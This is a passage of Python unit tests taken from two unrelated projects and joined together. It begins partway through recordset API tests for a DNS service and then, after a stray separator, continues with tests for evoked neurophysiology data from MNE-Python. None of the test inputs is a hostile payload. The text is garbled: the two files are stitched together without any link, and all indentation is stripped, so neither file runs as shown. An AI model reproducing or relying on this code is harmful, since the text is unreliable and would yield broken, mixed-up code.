self.assertEqual(2, len(response.json['records']))
self.assertEqual('CREATE', response.json['action'])
self.assertEqual('PENDING', response.json['status'])
# Check the zone's status is as expected
response = self.client.get('/zones/%s' % self.domain['id'],
headers=[('Accept', 'application/json')])
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual('UPDATE', response.json['action'])
self.assertEqual('PENDING', response.json['status'])
def test_create_recordset_with_invalid_name(self):
# Prepare a RecordSet fixture
body = self.get_recordset_fixture(
self.domain['name'],
'A',
fixture=0,
values={
'name': '`invalid`label`.%s' % self.domain['name'],
'records': [
'192.0.2.1',
'192.0.2.2',
]
}
)
url = '/zones/%s/recordsets' % self.domain['id']
# Ensure it fails with a 400
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
def test_create_recordset_with_name_too_long(self):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
fixture['name'] = 'x' * 255 + ".%s" % self.domain['name']
body = fixture
url = '/zones/%s/recordsets' % self.domain['id']
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
def test_create_recordset_with_name_missing(self):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
del fixture['name']
body = fixture
url = '/zones/%s/recordsets' % self.domain['id']
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
def test_create_recordset_type_is_missing(self):
# Prepare a RecordSet fixture
body = self.get_recordset_fixture(
self.domain['name'],
'A',
fixture=0,
values={
'name': 'name.%s' % self.domain['name'],
'records': [
'192.0.2.1',
'192.0.2.2',
]
}
)
del body['type']
url = '/zones/%s/recordsets' % self.domain['id']
# Ensure it fails with a 400
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
def test_create_recordset_with_invalid_type(self):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
fixture['type'] = "ABC"
body = fixture
url = '/zones/%s/recordsets' % self.domain['id']
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
def test_create_recordset_description_too_long(self):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
fixture['description'] = "x" * 161
body = fixture
url = '/zones/%s/recordsets' % self.domain['id']
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
def test_create_recordset_with_negative_ttl(self):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
fixture['ttl'] = -1
body = fixture
url = '/zones/%s/recordsets' % self.domain['id']
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
def test_create_recordset_with_zero_ttl(self):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
fixture['ttl'] = 0
body = fixture
url = '/zones/%s/recordsets' % self.domain['id']
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
def test_create_recordset_with_ttl_greater_than_max(self):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
fixture['ttl'] = 2147483648
body = fixture
url = '/zones/%s/recordsets' % self.domain['id']
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
def test_create_recordset_with_invalid_ttl(self):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
fixture['ttl'] = ">?!?"
body = fixture
url = '/zones/%s/recordsets' % self.domain['id']
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
def test_create_recordset_invalid_id(self):
self._assert_invalid_uuid(self.client.post, '/zones/%s/recordsets')
def test_create_recordset_validation(self):
# NOTE: The schemas should be tested separatly to the API. So we
# don't need to test every variation via the API itself.
# Fetch a fixture
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
url = '/zones/%s/recordsets' % self.domain['id']
# Add a junk field to the body
fixture['junk'] = 'Junk Field'
body = fixture
# Ensure it fails with a 400
self._assert_exception(
'invalid_object', 400, self.client.post_json, url, body)
@patch.object(central_service.Service, 'create_recordset',
side_effect=messaging.MessagingTimeout())
def test_create_recordset_timeout(self, _):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
body = fixture
url = '/zones/%s/recordsets' % self.domain['id']
self._assert_exception('timeout', 504, self.client.post_json, url,
body)
@patch.object(central_service.Service, 'create_recordset',
side_effect=exceptions.DuplicateRecordSet())
def test_create_recordset_duplicate(self, _):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
body = fixture
url = '/zones/%s/recordsets' % self.domain['id']
self._assert_exception('duplicate_recordset', 409,
self.client.post_json, url, body)
def test_create_recordset_invalid_domain(self):
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
body = fixture
url = '/zones/ba751950-6193-11e3-949a-0800200c9a66/recordsets'
self._assert_exception('domain_not_found', 404, self.client.post_json,
url, body)
def test_recordsets_invalid_url(self):
url = '/zones/recordsets'
self._assert_exception('not_found', 404, self.client.get, url)
self._assert_exception('not_found', 404, self.client.post_json, url)
# Pecan returns a 405 for Patch and delete operations
response = self.client.patch_json(url, status=405)
self.assertEqual(405, response.status_int)
response = self.client.delete(url, status=405)
self.assertEqual(405, response.status_int)
def test_get_recordsets(self):
url = '/zones/%s/recordsets' % self.domain['id']
response = self.client.get(url)
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the body structure is what we expect
self.assertIn('recordsets', response.json)
self.assertIn('links', response.json)
self.assertIn('self', response.json['links'])
# We should start with 2 pending recordsets for SOA & NS
# pending because pool manager is not active
self.assertEqual(2, len(response.json['recordsets']))
for recordset in response.json['recordsets']:
self.assertEqual('CREATE', recordset['action'])
self.assertEqual('PENDING', recordset['status'])
soa = self.central_service.find_recordset(
self.admin_context, criterion={'domain_id': self.domain['id'],
'type': 'SOA'})
ns = self.central_service.find_recordset(
self.admin_context, criterion={'domain_id': self.domain['id'],
'type': 'NS'})
data = [self.create_recordset(self.domain,
name='x-%s.%s' % (i, self.domain['name']))
for i in range(0, 10)]
data.insert(0, ns)
data.insert(0, soa)
self._assert_paging(data, url, key='recordsets')
self._assert_invalid_paging(data, url, key='recordsets')
def test_get_recordsets_filter(self):
# Add recordsets for testing
fixtures = [
self.get_recordset_fixture(
self.domain['name'], 'A', fixture=0, values={
'records': ['192.0.2.1', '192.0.2.2'],
'description': 'Tester1',
'ttl': 3600
}
),
self.get_recordset_fixture(
self.domain['name'], 'A', fixture=1, values={
'records': ['192.0.2.1'],
'description': 'Tester2',
'ttl': 4000
}
)
]
for fixture in fixtures:
response = self.client.post_json(
'/zones/%s/recordsets' % self.domain['id'],
fixture)
get_urls = [
# Filter by Name
'/zones/%s/recordsets?name=%s' % (
self.domain['id'], fixtures[0]['name']),
'/zones/%s/recordsets?data=192.0.2.1&name=%s' % (
self.domain['id'], fixtures[1]['name']),
# Filter by Type
'/zones/%s/recordsets?type=A' % self.domain['id'],
'/zones/%s/recordsets?type=A&name=%s' % (
self.domain['id'], fixtures[0]['name']),
# Filter by TTL
'/zones/%s/recordsets?ttl=3600' % self.domain['id'],
# Filter by Data
'/zones/%s/recordsets?data=192.0.2.1' % self.domain['id'],
'/zones/%s/recordsets?data=192.0.2.2' % self.domain['id'],
# Filter by Description
'/zones/%s/recordsets?description=Tester1' % self.domain['id']
]
correct_results = [1, 1, 2, 1, 1, 2, 1, 1]
for get_url, correct_result in \
six.moves.zip(get_urls, correct_results):
response = self.client.get(get_url)
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check that the correct number of recordsets match
self.assertEqual(correct_result, len(response.json['recordsets']))
def test_get_recordsets_invalid_id(self):
self._assert_invalid_uuid(self.client.get, '/zones/%s/recordsets')
@patch.object(central_service.Service, 'get_domain',
side_effect=messaging.MessagingTimeout())
def test_get_recordsets_timeout(self, _):
url = '/zones/ba751950-6193-11e3-949a-0800200c9a66/recordsets'
self._assert_exception('timeout', 504, self.client.get, url)
def test_get_deleted_recordsets(self):
zone = self.create_domain(fixture=1)
self.create_recordset(zone)
url = '/zones/%s/recordsets' % zone['id']
response = self.client.get(url)
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
# now delete the domain and get the recordsets
self.client.delete('/zones/%s' % zone['id'], status=202)
# Simulate the domain having been deleted on the backend
domain_serial = self.central_service.get_domain(
self.admin_context, zone['id']).serial
self.central_service.update_status(
self.admin_context, zone['id'], "SUCCESS", domain_serial)
# Check that we get a domain_not_found error
self._assert_exception('domain_not_found', 404, self.client.get, url)
def test_get_recordset(self):
# Create a recordset
recordset = self.create_recordset(self.domain)
url = '/zones/%s/recordsets/%s' % (self.domain['id'], recordset['id'])
response = self.client.get(url)
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn('links', response.json)
self.assertIn('self', response.json['links'])
# Check the values returned are what we expect
self.assertIn('id', response.json)
self.assertIn('created_at', response.json)
self.assertIsNone(response.json['updated_at'])
self.assertEqual(recordset['name'], response.json['name'])
self.assertEqual(recordset['type'], response.json['type'])
# The action and status are NONE and ACTIVE as there are no records
self.assertEqual('NONE', response.json['action'])
self.assertEqual('ACTIVE', response.json['status'])
def test_get_recordset_invalid_id(self):
self._assert_invalid_uuid(self.client.get, '/zones/%s/recordsets/%s')
@patch.object(central_service.Service, 'get_recordset',
side_effect=messaging.MessagingTimeout())
def test_get_recordset_timeout(self, _):
url = '/zones/%s/recordsets/ba751950-6193-11e3-949a-0800200c9a66' % (
self.domain['id'])
self._assert_exception('timeout', 504, self.client.get, url,
headers={'Accept': 'application/json'})
@patch.object(central_service.Service, 'get_recordset',
side_effect=exceptions.RecordSetNotFound())
def test_get_recordset_missing(self, _):
url = '/zones/%s/recordsets/ba751950-6193-11e3-949a-0800200c9a66' % (
self.domain['id'])
self._assert_exception('recordset_not_found', 404,
self.client.get, url,
headers={'Accept': 'application/json'})
def test_update_recordset(self):
# Create a recordset
recordset = self.create_recordset(self.domain)
# Prepare an update body
body = {'description': 'Tester'}
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
response = self.client.put_json(url, body, status=200)
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the body structure is what we expect
self.assertIn('links', response.json)
self.assertIn('self', response.json['links'])
# Check the values returned are what we expect
self.assertIn('id', response.json)
self.assertIsNotNone(response.json['updated_at'])
self.assertEqual('Tester', response.json['description'])
# The action and status are NONE and ACTIVE as there are no records
self.assertEqual('NONE', response.json['action'])
self.assertEqual('ACTIVE', response.json['status'])
# Check the zone's status is as expected
response = self.client.get('/zones/%s' % recordset['domain_id'],
headers=[('Accept', 'application/json')])
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual('UPDATE', response.json['action'])
self.assertEqual('PENDING', response.json['status'])
def test_update_recordset_with_record_create(self):
# Create a recordset
recordset = self.create_recordset(self.domain, 'A')
# The action and status are NONE and ACTIVE as there are no records
self.assertEqual('NONE', recordset['action'])
self.assertEqual('ACTIVE', recordset['status'])
# Prepare an update body
body = {'description': 'Tester',
'type': 'A',
'records': ['192.0.2.1', '192.0.2.2']}
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
response = self.client.put_json(url, body, status=202)
# Check the headers are what we expect
self.assertEqual(202, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the values returned are what we expect
self.assertIn('records', response.json)
self.assertEqual(2, len(response.json['records']))
self.assertEqual(set(['192.0.2.1', '192.0.2.2']),
set(response.json['records']))
self.assertEqual('UPDATE', response.json['action'])
self.assertEqual('PENDING', response.json['status'])
# Check the zone's status is as expected
response = self.client.get('/zones/%s' % recordset['domain_id'],
headers=[('Accept', 'application/json')])
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual('UPDATE', response.json['action'])
self.assertEqual('PENDING', response.json['status'])
def test_update_recordset_with_record_replace(self):
# Create a recordset with one record
recordset = self.create_recordset(self.domain, 'A')
self.create_record(self.domain, recordset)
# Prepare an update body
body = {'description': 'Tester',
'records': ['192.0.2.201', '192.0.2.202']}
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
response = self.client.put_json(url, body, status=202)
# Check the headers are what we expect
self.assertEqual(202, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the values returned are what we expect
self.assertIn('records', response.json)
self.assertEqual(2, len(response.json['records']))
self.assertEqual(set(['192.0.2.201', '192.0.2.202']),
set(response.json['records']))
# Check the zone's status is as expected
response = self.client.get('/zones/%s' % recordset['domain_id'],
headers=[('Accept', 'application/json')])
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual('UPDATE', response.json['action'])
self.assertEqual('PENDING', response.json['status'])
def test_update_recordset_with_record_clear(self):
# Create a recordset with one record
recordset = self.create_recordset(self.domain, 'A')
self.create_record(self.domain, recordset)
# Prepare an update body
body = {'description': 'Tester', 'records': []}
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
response = self.client.put_json(url, body, status=200)
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the values returned are what we expect
self.assertIn('records', response.json)
self.assertEqual(0, len(response.json['records']))
# Check the zone's status is as expected
response = self.client.get('/zones/%s' % recordset['domain_id'],
headers=[('Accept', 'application/json')])
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual('UPDATE', response.json['action'])
self.assertEqual('PENDING', response.json['status'])
def test_update_recordset_invalid_id(self):
self._assert_invalid_uuid(
self.client.put_json, '/zones/%s/recordsets/%s')
def test_update_recordset_validation(self):
# NOTE: The schemas should be tested separatly to the API. So we
# don't need to test every variation via the API itself.
# Create a zone
recordset = self.create_recordset(self.domain)
# Prepare an update body with junk in the wrapper
body = {'description': 'Tester',
'records': ['192.3.3.17'],
'junk': 'Junk Field'}
# Ensure it fails with a 400
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
self._assert_exception('invalid_object', 400, self.client.put_json,
url, body)
# Prepare an update body with junk in the body
body = {'description': 'Tester', 'junk': 'Junk Field'}
# Ensure it fails with a 400
self._assert_exception('invalid_object', 400, self.client.put_json,
url, body)
@patch.object(central_service.Service, 'get_recordset',
side_effect=exceptions.DuplicateRecordSet())
def test_update_recordset_duplicate(self, _):
# Prepare an update body
body = {'description': 'Tester'}
# Ensure it fails with a 409
url = ('/zones/%s/recordsets/ba751950-6193-11e3-949a-0800200c9a66'
% (self.domain['id']))
self._assert_exception('duplicate_recordset', 409,
self.client.put_json, url, body)
@patch.object(central_service.Service, 'get_recordset',
side_effect=messaging.MessagingTimeout())
def test_update_recordset_timeout(self, _):
# Prepare an update body
body = {'description': 'Tester'}
# Ensure it fails with a 504
url = ('/zones/%s/recordsets/ba751950-6193-11e3-949a-0800200c9a66'
% (self.domain['id']))
self._assert_exception('timeout', 504, self.client.put_json, url,
body)
@patch.object(central_service.Service, 'get_recordset',
side_effect=exceptions.RecordSetNotFound())
def test_update_recordset_missing(self, _):
# Prepare an update body
body = {'description': 'Tester'}
# Ensure it fails with a 404
url = ('/zones/%s/recordsets/ba751950-6193-11e3-949a-0800200c9a66'
% (self.domain['id']))
self._assert_exception('recordset_not_found', 404,
self.client.put_json, url, body)
def test_update_recordset_invalid_ttl(self):
recordset = self.create_recordset(self.domain)
body = {'ttl': '>?!@'}
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
self._assert_exception('invalid_object', 400,
self.client.put_json, url, body)
def test_update_recordset_zero_ttl(self):
recordset = self.create_recordset(self.domain)
body = {'ttl': 0}
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
self._assert_exception('invalid_object', 400,
self.client.put_json, url, body)
def test_update_recordset_negative_ttl(self):
recordset = self.create_recordset(self.domain)
body = {'ttl': -1}
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
self._assert_exception('invalid_object', 400,
self.client.put_json, url, body)
def test_update_recordset_ttl_greater_than_max(self):
recordset = self.create_recordset(self.domain)
body = {'ttl': 2174483648}
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
self._assert_exception('invalid_object', 400,
self.client.put_json, url, body)
def test_update_recordset_description_too_long(self):
recordset = self.create_recordset(self.domain)
body = {'description': 'x' * 161}
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
self._assert_exception('invalid_object', 400,
self.client.put_json, url, body)
def test_delete_recordset(self):
recordset = self.create_recordset(self.domain)
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
response = self.client.delete(url, status=202)
self.assertEqual('application/json', response.content_type)
# Currently recordset does not have a status field. As there are no
# records, the recordset action/status show up as 'NONE', 'ACTIVE'
self.assertEqual('NONE', response.json['action'])
self.assertEqual('ACTIVE', response.json['status'])
# Check the zone's status is as expected
response = self.client.get('/zones/%s' % recordset['domain_id'],
headers=[('Accept', 'application/json')])
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual('UPDATE', response.json['action'])
self.assertEqual('PENDING', response.json['status'])
def test_delete_recordset_with_records(self):
# Create a recordset with one record
recordset = self.create_recordset(self.domain, 'A')
self.create_record(self.domain, recordset)
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
response = self.client.delete(url, status=202)
self.assertEqual('application/json', response.content_type)
self.assertEqual('DELETE', response.json['action'])
self.assertEqual('PENDING', response.json['status'])
# Check the zone's status is as expected
response = self.client.get('/zones/%s' % recordset['domain_id'],
headers=[('Accept', 'application/json')])
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual('UPDATE', response.json['action'])
self.assertEqual('PENDING', response.json['status'])
@patch.object(central_service.Service, 'delete_recordset',
side_effect=exceptions.RecordSetNotFound())
def test_delete_recordset_missing(self, _):
url = ('/zones/%s/recordsets/ba751950-6193-11e3-949a-0800200c9a66'
% (self.domain['id']))
self._assert_exception('recordset_not_found', 404,
self.client.delete, url)
def test_delete_recordset_invalid_id(self):
self._assert_invalid_uuid(
self.client.delete, '/zones/%s/recordsets/%s')
def test_metadata_exists(self):
url = '/zones/%s/recordsets' % self.domain['id']
response = self.client.get(url)
# Make sure the fields exist
self.assertIn('metadata', response.json)
self.assertIn('total_count', response.json['metadata'])
def test_total_count(self):
url = '/zones/%s/recordsets' % self.domain['id']
response = self.client.get(url)
# The NS and SOA records are there by default
self.assertEqual(2, response.json['metadata']['total_count'])
# Create a recordset
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
response = self.client.post_json(
'/zones/%s/recordsets' % self.domain['id'], fixture)
response = self.client.get(url)
# Make sure total_count picked up the change
self.assertEqual(3, response.json['metadata']['total_count'])
def test_total_count_filtered_by_data(self):
# Closes bug 1447325
url = '/zones/%s/recordsets' % self.domain['id']
# Create a recordset
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
response = self.client.post_json(
'/zones/%s/recordsets' % self.domain['id'], fixture)
response = self.client.get(url)
# Make sure total_count picked up the change
self.assertEqual(3, response.json['metadata']['total_count'])
url = '/zones/%s/recordsets?data=nyan' % self.domain['id']
response = self.client.get(url)
self.assertEqual(0, response.json['metadata']['total_count'])
url = '/zones/%s/recordsets?data=ns1.example.org.' % self.domain['id']
response = self.client.get(url)
self.assertEqual(1, response.json['metadata']['total_count'])
# Test paging
new_domain = self.create_domain(name='example.net.')
recordset = self.create_recordset(new_domain, 'A')
self.create_record(new_domain, recordset, data='nyan')
recordset = self.create_recordset(new_domain, 'CNAME')
self.create_record(new_domain, recordset, data='nyan')
# Even with paging enabled, total_count is still the total number of
# recordsets matching the "data" filter
url = '/zones/%s/recordsets?limit=1&data=nyan' % new_domain.id
response = self.client.get(url)
self.assertEqual(2, response.json['metadata']['total_count'])
def test_total_count_pagination(self):
# Create two recordsets
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
response = self.client.post_json(
'/zones/%s/recordsets' % self.domain['id'], fixture)
fixture = self.get_recordset_fixture(self.domain['name'], fixture=1)
response = self.client.post_json(
'/zones/%s/recordsets' % self.domain['id'], fixture)
# Paginate the recordsets to two, there should be four now
url = '/zones/%s/recordsets?limit=2' % self.domain['id']
response = self.client.get(url)
# There are two recordsets returned
self.assertEqual(2, len(response.json['recordsets']))
# But there should be four in total (NS/SOA + the created)
self.assertEqual(4, response.json['metadata']['total_count'])
# Secondary Zones specific tests
def test_get_secondary_zone_recordset(self):
fixture = self.get_domain_fixture('SECONDARY', 1)
fixture['email'] = 'root@example.com'
secondary = self.create_domain(**fixture)
# Create a recordset
recordset = self.create_recordset(secondary)
url = '/zones/%s/recordsets/%s' % (secondary['id'], recordset['id'])
response = self.client.get(url)
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertIn('links', response.json)
self.assertIn('self', response.json['links'])
# Check the values returned are what we expect
self.assertIn('id', response.json)
self.assertIn('created_at', response.json)
self.assertIsNone(response.json['updated_at'])
self.assertEqual(recordset['name'], response.json['name'])
self.assertEqual(recordset['type'], response.json['type'])
def test_get_secondary_zone_recordsets(self):
fixture = self.get_domain_fixture('SECONDARY', 1)
fixture['email'] = 'foo@bar.io'
secondary = self.create_domain(**fixture)
url = '/zones/%s/recordsets' % secondary['id']
response = self.client.get(url)
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the body structure is what we expect
self.assertIn('recordsets', response.json)
self.assertIn('links', response.json)
self.assertIn('self', response.json['links'])
# We should start with 2 recordsets for SOA & NS
self.assertEqual(1, len(response.json['recordsets']))
soa = self.central_service.find_recordset(
self.admin_context, criterion={'domain_id': secondary['id'],
'type': 'SOA'})
data = [self.create_recordset(secondary,
name='x-%s.%s' % (i, secondary['name']))
for i in range(0, 10)]
data.insert(0, soa)
self._assert_paging(data, url, key='recordsets')
self._assert_invalid_paging(data, url, key='recordsets')
def test_create_secondary_zone_recordset(self):
fixture = self.get_domain_fixture('SECONDARY', 1)
fixture['email'] = 'foo@bar.io'
secondary = self.create_domain(**fixture)
fixture = self.get_recordset_fixture(secondary['name'], fixture=0)
url = '/zones/%s/recordsets' % secondary['id']
self._assert_exception('forbidden', 403, self.client.post_json, url,
fixture)
def test_update_secondary_zone_recordset(self):
fixture = self.get_domain_fixture('SECONDARY', 1)
fixture['email'] = 'foo@bar.io'
secondary = self.create_domain(**fixture)
# Set the context so that we can create a RRSet
recordset = self.create_recordset(secondary)
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
self._assert_exception('forbidden', 403, self.client.put_json, url,
{'ttl': 100})
def test_delete_secondary_zone_recordset(self):
fixture = self.get_domain_fixture('SECONDARY', 1)
fixture['email'] = 'foo@bar.io'
secondary = self.create_domain(**fixture)
# Set the context so that we can create a RRSet
recordset = self.create_recordset(secondary)
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
self._assert_exception('forbidden', 403, self.client.delete, url)
def test_no_create_rs_deleting_zone(self):
# Prepare a create
fixture = self.get_recordset_fixture(self.domain['name'], fixture=0)
body = fixture
self.client.delete('/zones/%s' % self.domain['id'], status=202)
self._assert_exception('bad_request', 400, self.client.post_json,
'/zones/%s/recordsets' % self.domain['id'],
body)
def test_no_update_rs_deleting_zone(self):
# Create a recordset
recordset = self.create_recordset(self.domain)
# Prepare an update body
body = {'description': 'Tester'}
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
self.client.delete('/zones/%s' % self.domain['id'], status=202)
self._assert_exception('bad_request', 400, self.client.put_json, url,
body)
def test_no_delete_rs_deleting_zone(self):
# Create a recordset
recordset = self.create_recordset(self.domain)
url = '/zones/%s/recordsets/%s' % (recordset['domain_id'],
recordset['id'])
self.client.delete('/zones/%s' % self.domain['id'], status=202)
self._assert_exception('bad_request', 400, self.client.delete, url)
def test_invalid_recordset_filter(self):
invalid_url = '/zones/%s/recordsets?action=NONE' % self.domain['id']
self._assert_exception(
'bad_request', 400, self.client.get, invalid_url)
| |
# Author: Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# Denis Engemann <denis.engemann@gmail.com>
# Andrew Dykstra <andrew.r.dykstra@gmail.com>
# Mads Jensen <mje.mads@gmail.com>
#
# License: BSD (3-clause)
import os.path as op
from copy import deepcopy
import warnings
import numpy as np
from scipy import fftpack
from numpy.testing import (assert_array_almost_equal, assert_equal,
assert_array_equal, assert_allclose)
from nose.tools import assert_true, assert_raises, assert_not_equal
from mne import (equalize_channels, pick_types, read_evokeds, write_evokeds,
grand_average, combine_evoked)
from mne.evoked import _get_peak, EvokedArray
from mne.epochs import EpochsArray
from mne.utils import (_TempDir, requires_pandas, slow_test,
requires_scipy_version)
from mne.io.meas_info import create_info
from mne.externals.six.moves import cPickle as pickle
warnings.simplefilter('always')
fname = op.join(op.dirname(__file__), '..', 'io', 'tests', 'data',
'test-ave.fif')
fname_gz = op.join(op.dirname(__file__), '..', 'io', 'tests', 'data',
'test-ave.fif.gz')
@requires_scipy_version('0.14')
def test_savgol_filter():
"""Test savgol filtering
"""
h_freq = 10.
evoked = read_evokeds(fname, 0)
freqs = fftpack.fftfreq(len(evoked.times), 1. / evoked.info['sfreq'])
data = np.abs(fftpack.fft(evoked.data))
match_mask = np.logical_and(freqs >= 0, freqs <= h_freq / 2.)
mismatch_mask = np.logical_and(freqs >= h_freq * 2, freqs < 50.)
assert_raises(ValueError, evoked.savgol_filter, evoked.info['sfreq'])
evoked.savgol_filter(h_freq)
data_filt = np.abs(fftpack.fft(evoked.data))
# decent in pass-band
assert_allclose(np.mean(data[:, match_mask], 0),
np.mean(data_filt[:, match_mask], 0),
rtol=1e-4, atol=1e-2)
# suppression in stop-band
assert_true(np.mean(data[:, mismatch_mask]) >
np.mean(data_filt[:, mismatch_mask]) * 5)
def test_hash_evoked():
"""Test evoked hashing
"""
ave = read_evokeds(fname, 0)
ave_2 = read_evokeds(fname, 0)
assert_equal(hash(ave), hash(ave_2))
# do NOT use assert_equal here, failing output is terrible
assert_true(pickle.dumps(ave) == pickle.dumps(ave_2))
ave_2.data[0, 0] -= 1
assert_not_equal(hash(ave), hash(ave_2))
@slow_test
def test_io_evoked():
"""Test IO for evoked data (fif + gz) with integer and str args
"""
tempdir = _TempDir()
ave = read_evokeds(fname, 0)
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave)
ave2 = read_evokeds(op.join(tempdir, 'evoked-ave.fif'))[0]
# This not being assert_array_equal due to windows rounding
assert_true(np.allclose(ave.data, ave2.data, atol=1e-16, rtol=1e-3))
assert_array_almost_equal(ave.times, ave2.times)
assert_equal(ave.nave, ave2.nave)
assert_equal(ave._aspect_kind, ave2._aspect_kind)
assert_equal(ave.kind, ave2.kind)
assert_equal(ave.last, ave2.last)
assert_equal(ave.first, ave2.first)
assert_true(repr(ave))
# test compressed i/o
ave2 = read_evokeds(fname_gz, 0)
assert_true(np.allclose(ave.data, ave2.data, atol=1e-16, rtol=1e-8))
# test str access
condition = 'Left Auditory'
assert_raises(ValueError, read_evokeds, fname, condition, kind='stderr')
assert_raises(ValueError, read_evokeds, fname, condition,
kind='standard_error')
ave3 = read_evokeds(fname, condition)
assert_array_almost_equal(ave.data, ave3.data, 19)
# test read_evokeds and write_evokeds
types = ['Left Auditory', 'Right Auditory', 'Left visual', 'Right visual']
aves1 = read_evokeds(fname)
aves2 = read_evokeds(fname, [0, 1, 2, 3])
aves3 = read_evokeds(fname, types)
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), aves1)
aves4 = read_evokeds(op.join(tempdir, 'evoked-ave.fif'))
for aves in [aves2, aves3, aves4]:
for [av1, av2] in zip(aves1, aves):
assert_array_almost_equal(av1.data, av2.data)
assert_array_almost_equal(av1.times, av2.times)
assert_equal(av1.nave, av2.nave)
assert_equal(av1.kind, av2.kind)
assert_equal(av1._aspect_kind, av2._aspect_kind)
assert_equal(av1.last, av2.last)
assert_equal(av1.first, av2.first)
assert_equal(av1.comment, av2.comment)
# test warnings on bad filenames
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
fname2 = op.join(tempdir, 'test-bad-name.fif')
write_evokeds(fname2, ave)
read_evokeds(fname2)
assert_true(len(w) == 2)
def test_shift_time_evoked():
""" Test for shifting of time scale
"""
tempdir = _TempDir()
# Shift backward
ave = read_evokeds(fname, 0)
ave.shift_time(-0.1, relative=True)
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave)
# Shift forward twice the amount
ave_bshift = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
ave_bshift.shift_time(0.2, relative=True)
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave_bshift)
# Shift backward again
ave_fshift = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
ave_fshift.shift_time(-0.1, relative=True)
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave_fshift)
ave_normal = read_evokeds(fname, 0)
ave_relative = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
assert_true(np.allclose(ave_normal.data, ave_relative.data,
atol=1e-16, rtol=1e-3))
assert_array_almost_equal(ave_normal.times, ave_relative.times, 10)
assert_equal(ave_normal.last, ave_relative.last)
assert_equal(ave_normal.first, ave_relative.first)
# Absolute time shift
ave = read_evokeds(fname, 0)
ave.shift_time(-0.3, relative=False)
write_evokeds(op.join(tempdir, 'evoked-ave.fif'), ave)
ave_absolute = read_evokeds(op.join(tempdir, 'evoked-ave.fif'), 0)
assert_true(np.allclose(ave_normal.data, ave_absolute.data,
atol=1e-16, rtol=1e-3))
assert_equal(ave_absolute.first, int(-0.3 * ave.info['sfreq']))
